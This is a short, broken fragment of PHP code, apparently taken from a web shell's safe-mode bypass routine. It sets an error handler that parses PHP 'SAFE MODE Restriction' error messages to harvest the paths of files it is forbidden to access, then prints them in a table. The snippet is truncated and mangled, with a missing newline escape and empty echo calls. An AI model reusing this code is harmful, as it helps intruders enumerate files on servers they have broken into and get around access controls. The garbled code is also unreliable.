foreach($D as $item) echo "{$item}n"; function eh($errno, $errstr, $errfile, $errline){ global $D, $c, $i; preg_match("/SAFE MODE Restriction in effect..*whose uid is(.*)is not allowed to access(.*)owned by uid(.*)/", $errstr, $o); if($o){ $D[$c] = $o[2]; $c++;} } echo ""; $tb->tdbody ("

"); ?>